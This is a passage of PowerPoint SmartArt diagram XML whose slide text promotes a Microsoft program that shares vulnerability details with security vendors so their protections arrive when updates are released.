      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Enhances protection at both the application and network layers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3BEF19C-4297-46EB-89E8-E8E2192326FD}" type="parTrans" cxnId="{705F40A5-3C9A-4A76-A3F5-BC12DF966C5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F537C50-A920-4288-A29A-E3F3A9112686}" type="sibTrans" cxnId="{705F40A5-3C9A-4A76-A3F5-BC12DF966C5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Improves time and quality of protection release </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40B6E933-C374-45EE-B4E9-B29236078D66}" type="parTrans" cxnId="{EF3B5C12-6758-463F-9215-541D2261A756}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF3B15CE-93C7-4741-B163-9FF528CF843E}" type="sibTrans" cxnId="{EF3B5C12-6758-463F-9215-541D2261A756}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{453E0DD0-FF88-47B7-843F-C791052BF443}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Customers have improved defense in depth protections while testing and deploying Microsoft security updates</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74B473FC-1665-42E6-A47F-AE33EDBEE638}" type="parTrans" cxnId="{7E3EDC4E-ABD0-43E0-AF53-946CC44B8C27}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9854C936-C4BF-4A67-BEF6-BB7DC4E7E5F9}" type="sibTrans" cxnId="{7E3EDC4E-ABD0-43E0-AF53-946CC44B8C27}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A81F7CAA-2E7D-4EE5-9C5F-FAF1EA7DAE65}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Protect the enterprise customers and home user by helping the security providers of their choice get a leg up on exploit code</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2B7F4A8-10EC-43C7-8F49-DCCF1C6A6A25}" type="parTrans" cxnId="{DDDF99AF-600E-4542-B832-785A6C8CF2D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08CF9795-CA98-470E-A8F6-A1DEA0353701}" type="sibTrans" cxnId="{DDDF99AF-600E-4542-B832-785A6C8CF2D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD8B7191-2496-4A50-AC2A-68C653DD1A1E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Customers receive improved 3</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
            <a:t>rd</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> party protections that are available faster</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AE2AAB6-F993-41F5-8363-2322B3459BF3}" type="parTrans" cxnId="{E5D9CBE1-B09E-40D0-9A91-7E03DF4258DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A9A253B-9209-4AE9-A0BA-CCB0B6B262B8}" type="sibTrans" cxnId="{E5D9CBE1-B09E-40D0-9A91-7E03DF4258DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAD54738-4EB9-4FBB-A94C-77DEE5AEB6F2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Provides a streamlined information collaboration framework with among Microsoft partners, vendors, infrastructure providers, and customers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{982123A2-CF2B-47CD-847F-3EC61D3BF77A}" type="parTrans" cxnId="{D0B7927A-5A77-4221-9BBF-DA6F94D3E597}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87DFC233-E2A9-4F83-B4DE-0C0846FA5471}" type="sibTrans" cxnId="{D0B7927A-5A77-4221-9BBF-DA6F94D3E597}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F758BE5-9027-48EB-8163-C2F3FBDC8800}" type="pres">
      <dgm:prSet presAssocID="{D6D4E787-4EAE-4870-897C-C242601D1086}" presName="composite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5CEE709-216E-4969-A412-F38B0612CF5E}" type="pres">
      <dgm:prSet presAssocID="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" presName="roof" presStyleLbl="dkBgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2DC7CFD-2BB2-4224-AF4B-47CA87223EA8}" type="pres">
      <dgm:prSet presAssocID="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" presName="pillars" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{140D7B2A-0B8D-4221-9467-E7C1A8864BA9}" type="pres">
      <dgm:prSet presAssocID="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" presName="pillar1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FEC8B98-82FD-420F-8528-1310A7E852C0}" type="pres">
      <dgm:prSet presAssocID="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}" presName="pillarX" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEE31A30-2CC7-4D6D-8394-E3F19F0C68DF}" type="pres">
      <dgm:prSet presAssocID="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" presName="base" presStyleLbl="dkBgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr>
        <a:noFill/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E5D9CBE1-B09E-40D0-9A91-7E03DF4258DC}" srcId="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}" destId="{FD8B7191-2496-4A50-AC2A-68C653DD1A1E}" srcOrd="0" destOrd="0" parTransId="{6AE2AAB6-F993-41F5-8363-2322B3459BF3}" sibTransId="{9A9A253B-9209-4AE9-A0BA-CCB0B6B262B8}"/>
    <dgm:cxn modelId="{D0B7927A-5A77-4221-9BBF-DA6F94D3E597}" srcId="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}" destId="{FAD54738-4EB9-4FBB-A94C-77DEE5AEB6F2}" srcOrd="1" destOrd="0" parTransId="{982123A2-CF2B-47CD-847F-3EC61D3BF77A}" sibTransId="{87DFC233-E2A9-4F83-B4DE-0C0846FA5471}"/>
    <dgm:cxn modelId="{705F40A5-3C9A-4A76-A3F5-BC12DF966C5B}" srcId="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" destId="{F5064AF9-F416-40A2-8D07-10CD01255403}" srcOrd="0" destOrd="0" parTransId="{A3BEF19C-4297-46EB-89E8-E8E2192326FD}" sibTransId="{7F537C50-A920-4288-A29A-E3F3A9112686}"/>
    <dgm:cxn modelId="{7E3EDC4E-ABD0-43E0-AF53-946CC44B8C27}" srcId="{F5064AF9-F416-40A2-8D07-10CD01255403}" destId="{453E0DD0-FF88-47B7-843F-C791052BF443}" srcOrd="0" destOrd="0" parTransId="{74B473FC-1665-42E6-A47F-AE33EDBEE638}" sibTransId="{9854C936-C4BF-4A67-BEF6-BB7DC4E7E5F9}"/>
    <dgm:cxn modelId="{DDDF99AF-600E-4542-B832-785A6C8CF2D9}" srcId="{F5064AF9-F416-40A2-8D07-10CD01255403}" destId="{A81F7CAA-2E7D-4EE5-9C5F-FAF1EA7DAE65}" srcOrd="1" destOrd="0" parTransId="{E2B7F4A8-10EC-43C7-8F49-DCCF1C6A6A25}" sibTransId="{08CF9795-CA98-470E-A8F6-A1DEA0353701}"/>
    <dgm:cxn modelId="{EF3B5C12-6758-463F-9215-541D2261A756}" srcId="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" destId="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}" srcOrd="1" destOrd="0" parTransId="{40B6E933-C374-45EE-B4E9-B29236078D66}" sibTransId="{AF3B15CE-93C7-4741-B163-9FF528CF843E}"/>
    <dgm:cxn modelId="{7B935425-1B3C-4E94-A3A6-D6C09D3D52A1}" type="presOf" srcId="{453E0DD0-FF88-47B7-843F-C791052BF443}" destId="{140D7B2A-0B8D-4221-9467-E7C1A8864BA9}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{67E7724F-57C9-42C6-829A-0BD1C45B682D}" type="presOf" srcId="{F5064AF9-F416-40A2-8D07-10CD01255403}" destId="{140D7B2A-0B8D-4221-9467-E7C1A8864BA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{53B53286-792B-4DE2-9B2A-416CD97629A1}" type="presOf" srcId="{A81F7CAA-2E7D-4EE5-9C5F-FAF1EA7DAE65}" destId="{140D7B2A-0B8D-4221-9467-E7C1A8864BA9}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{E9ED17A9-F33B-4C69-97B7-C22A79265B9D}" type="presOf" srcId="{FAD54738-4EB9-4FBB-A94C-77DEE5AEB6F2}" destId="{9FEC8B98-82FD-420F-8528-1310A7E852C0}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{3DF82ECF-D755-4DA2-85B1-8AEF60C4F373}" type="presOf" srcId="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" destId="{F5CEE709-216E-4969-A412-F38B0612CF5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{54283D23-4BF5-44D4-AE1B-9B8758ED6533}" type="presOf" srcId="{4FA1F72B-D442-43A2-990B-2C5D1CFE5AC8}" destId="{9FEC8B98-82FD-420F-8528-1310A7E852C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{EFACCD49-46FF-4A64-B96B-BD479FB97EA9}" type="presOf" srcId="{D6D4E787-4EAE-4870-897C-C242601D1086}" destId="{8F758BE5-9027-48EB-8163-C2F3FBDC8800}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{E292308E-C5EB-4684-96F5-791E0DF93750}" srcId="{D6D4E787-4EAE-4870-897C-C242601D1086}" destId="{0EFEE082-12B1-4882-AF57-8D44B44E0CF2}" srcOrd="0" destOrd="0" parTransId="{720F7B2E-1287-473F-9C7D-D477E9342C9F}" sibTransId="{045BFF24-9A1D-4903-AFB8-C1ECF32B8688}"/>
    <dgm:cxn modelId="{A918A25C-E970-4C32-BEE1-53AE97E484B2}" type="presOf" srcId="{FD8B7191-2496-4A50-AC2A-68C653DD1A1E}" destId="{9FEC8B98-82FD-420F-8528-1310A7E852C0}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{9090EA1F-DB23-41EF-8420-C11D9BD0E0CF}" type="presParOf" srcId="{8F758BE5-9027-48EB-8163-C2F3FBDC8800}" destId="{F5CEE709-216E-4969-A412-F38B0612CF5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{2EE3D08A-BE4A-4B71-BFA6-8038479636F1}" type="presParOf" srcId="{8F758BE5-9027-48EB-8163-C2F3FBDC8800}" destId="{F2DC7CFD-2BB2-4224-AF4B-47CA87223EA8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{888D2569-78E3-42D9-952C-38C58C20EDCF}" type="presParOf" srcId="{F2DC7CFD-2BB2-4224-AF4B-47CA87223EA8}" destId="{140D7B2A-0B8D-4221-9467-E7C1A8864BA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{74485ACA-E64E-4E92-8168-5480123B670A}" type="presParOf" srcId="{F2DC7CFD-2BB2-4224-AF4B-47CA87223EA8}" destId="{9FEC8B98-82FD-420F-8528-1310A7E852C0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{B57A8C56-A67B-46F5-B0CE-843BE4617A0B}" type="presParOf" srcId="{8F758BE5-9027-48EB-8163-C2F3FBDC8800}" destId="{AEE31A30-2CC7-4D6D-8394-E3F19F0C68DF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data2.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_3" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41F060B7-F5D3-4EF6-A8DD-5F04A3010E3E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>“Are protections available while I deploy Microsoft updates?”</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" i="1" dirty="0" smtClean="0"/>
            <a:t>Customers expect their security protection software to help thwart attacks while evaluating updates.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7AC9DC3-C99A-4AC1-B85A-040B85350835}" type="parTrans" cxnId="{63D68E4D-EA0A-4DD1-A5F0-83664AEDD2AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4F2901F-6005-48FA-9649-B0CC3798BE4D}" type="sibTrans" cxnId="{63D68E4D-EA0A-4DD1-A5F0-83664AEDD2AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E2252A9-67E2-4586-AF2B-AF0D912FD202}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>The Reality is….</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" i="1" dirty="0" smtClean="0"/>
            <a:t>While most protections providers are very fast, it’s not always before attackers have released exploit code.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC96D1EC-494E-42F9-8D9B-AF1E428E2E4A}" type="parTrans" cxnId="{8501D0BA-CCB3-464E-BAED-CCC718A57BC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13678C14-7175-4BE4-A985-F20D04395340}" type="sibTrans" cxnId="{8501D0BA-CCB3-464E-BAED-CCC718A57BC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC0C6B82-9677-46D1-9D2D-BA9ADEA30C0C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
            <a:t>Our Goal is…. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1500" i="1" dirty="0" smtClean="0"/>
            <a:t>Customers using security protection software are protected from the vulnerabilities </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" b="1" i="1" dirty="0" smtClean="0"/>
            <a:t>at the same time the updates are released.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A1FB069-AA70-4F7F-9750-6B56B3F3CCC5}" type="parTrans" cxnId="{9D5E6EB3-F533-4E7A-A9F1-1AF6BC957EAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3C0BFFC-7C02-4CB0-AB55-49E836DAF8CE}" type="sibTrans" cxnId="{9D5E6EB3-F533-4E7A-A9F1-1AF6BC957EAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D714752D-CEE8-442A-B46F-7D94F902CE9F}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC0B44DC-E5AC-4BEA-8C9E-41F06EF4014E}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08473F64-EE6B-4269-A956-9482A39605D8}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FBAB0AD-9980-4A9F-8C5C-DA90A72A03D7}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3728BD06-6146-4D4A-80E3-9464341FEE8F}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9E61853-94AF-4042-A55C-45E3E69CDD16}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeConn_1-2" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024649F1-E745-42A3-AE56-9F83F5DB48F2}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeConn_2-3" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8E43E76-BBA1-478E-84E7-410EE35EB74D}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_1_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0848AD43-A3C8-46DD-BE06-E90202A9CFCC}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_2_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9158B13C-A161-4070-8419-7D5C79EED834}" type="pres">
      <dgm:prSet presAssocID="{575D0CB9-4001-4E63-8184-4D38EA2913D8}" presName="ThreeNodes_3_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
